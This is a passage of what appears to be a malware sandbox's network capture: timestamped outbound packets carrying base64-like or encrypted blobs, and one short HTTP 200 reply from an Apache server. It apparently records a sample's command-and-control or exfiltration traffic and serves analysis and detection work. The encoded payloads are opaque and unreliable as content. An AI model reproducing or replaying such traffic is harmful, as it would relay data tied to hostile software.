Jan 3, 2025 18:27:41.520301104 CET	2472	OUT	Data Raw: 77 49 73 76 6f 71 2f 56 4d 50 71 30 4e 7a 6e 77 6c 56 61 35 73 70 6e 35 66 49 58 6b 2b 78 74 2b 51 76 6e 79 65 71 43 4f 52 7a 45 4b 74 33 44 76 39 52 73 4f 43 32 6c 61 4b 72 62 45 49 52 6b 63 67 73 64 55 4d 56 64 37 64 7a 51 35 75 30 6c 79 6a 7a Data Ascii: wIsvoq/VMPq0NznwlVa5spn5fIXk+xt+QvnyeqCORzEKt3Dv9RsOC2laKrbEIRkcgsdUMVd7dzQ5u0lyjz6f97rCLYbiTrlOtvGIzvj5jCMW2IZ7J3T3JR1a1zC6le+Y+XthgZuAg6Pqkys3lK5JHdvvVSh3y2PsDnYVe+A1MXy/T6a3i1gx3X0Zh3cqutfqj8u3UjFCS98sf2NGs2DW/hVnL/uYoX2T7T7n4IxWsdLFhzXHdLN
Jan 3, 2025 18:27:41.520311117 CET	2472	OUT	Data Raw: 46 70 77 63 66 78 54 63 68 73 76 57 4e 62 5a 77 4d 4d 37 47 30 65 48 6f 2b 58 32 38 46 73 4c 36 4e 75 34 7a 2b 44 33 4f 63 68 49 44 55 58 4c 5a 61 63 32 76 33 61 59 7a 38 68 46 74 6a 73 4f 65 5a 33 41 31 6a 54 50 64 48 42 6f 61 32 4c 66 6d 4d 33 Data Ascii: FpwcfxTchsvWNbZwMM7G0eHo+X28FsL6Nu4z+D3OchIDUXLZac2v3aYz8hFtjsOeZ3A1jTPdHBoa2LfmM306YYtCezWddYmBrrt2ZYpP2ei37p3Cn3+i36yWCuMB5U0ERyPtGDw7D/M7EXpe9MlcLorgT0qX3WtrZ9NUR4LCckhiD7ITN9nu4Vn/NXwrQQCaiUbrPqNAsoBqM/HBN+vGh2oKKOJryqDENS0USyYJEzmR/pkeU+W
Jan 3, 2025 18:27:41.520473003 CET	2472	OUT	Data Raw: 69 2f 50 34 37 4b 77 45 33 30 45 2b 56 62 57 4c 68 4e 7a 66 32 4b 52 52 4d 6b 74 72 61 69 41 31 2f 76 55 7a 51 4e 77 36 31 57 44 4c 2b 2f 52 64 6b 5a 2f 39 71 77 78 56 6e 30 50 54 45 35 31 69 66 64 50 7a 75 74 31 63 34 4d 71 76 71 7a 75 33 2f 2f Data Ascii: i/P47KwE30E+VbWLhNzf2KRRMktraiA1/vUzQNw61WDL+/RdkZ/9qwxVn0PTE51ifdPzut1c4Mqvqzu3//6NnFQ0+KDy6iRBkHewmIvIuZI8P5A7HNwPSNnPhG/6RJXaBCozhHF3ODtFFrgCvD9AJK/IXswP5rxtk3eJ8Ro9wAIsVo/I+NRc3xlWfvWc1u5aMNfaHrc7RQTd+RXuZ6jEGklrM/kWCxAwI+0UJCkushwfCPBWmEJ
Jan 3, 2025 18:27:41.524751902 CET	4944	OUT	Data Raw: 47 4d 70 55 72 6d 4f 42 70 52 71 4d 4f 4b 77 6c 59 6b 4e 43 35 67 54 6e 53 4d 49 7a 74 6b 75 64 4e 33 69 5a 7a 7a 45 52 47 4b 4b 6d 58 2f 73 79 77 2b 66 54 6d 43 42 37 32 4e 2f 62 57 4f 44 2b 4a 42 57 5a 79 47 75 7a 32 2f 63 6a 77 59 78 66 46 44 Data Ascii: GMpUrmOBpRqMOKwlYkNC5gTnSMIztkudN3iZzzERGKKmX/syw+fTmCB72N/bWOD+JBWZyGuz2/cjwYxfFDXNIauDRUz2rppeJumerOSW5Pp/jN++S1BKhrndDkWjjUJY/g1GdEqtb0QvcuideQokjOunBVe5HWJCSnlJSW5ZkU2P/A9ERCnb2AX2Gjea2bl/tcA5/9eKbCo68TKwibstIlAal50kPmCIs5n/bl3pcr/cy/mB14X
Jan 3, 2025 18:27:41.524914980 CET	2472	OUT	Data Raw: 73 49 59 6c 47 65 53 62 45 65 76 6f 78 64 72 63 4c 2f 76 51 65 67 39 48 52 4a 4e 4d 35 31 71 58 47 77 4d 4a 33 58 47 6f 6f 71 62 52 4a 2f 76 70 67 38 45 74 59 66 34 74 31 6f 72 41 6e 79 78 4c 78 38 62 31 64 50 4d 63 61 5a 73 76 66 52 42 69 74 6d Data Ascii: sIYlGeSbEevoxdrcL/vQeg9HRJNM51qXGwMJ3XGooqbRJ/vpg8EtYf4t1orAnyxLx8b1dPMcaZsvfRBitmIQTcma27Rsrr/8ksO/13/w9kzX1+zSTkbU+N9eb2h61Nr36Oeimy58IbfasghTiY8YWap5Eyiyc9kRDrr7643rftVmw3gPXVUYhp0OM7adGqJa1GHkPWUx/FtSWlae9D4vNd7PACfVsw2bU4sOqiN2D+zmLd7po08
Jan 3, 2025 18:27:42.105762005 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3f 55 5d 54 Data Ascii: ?U]T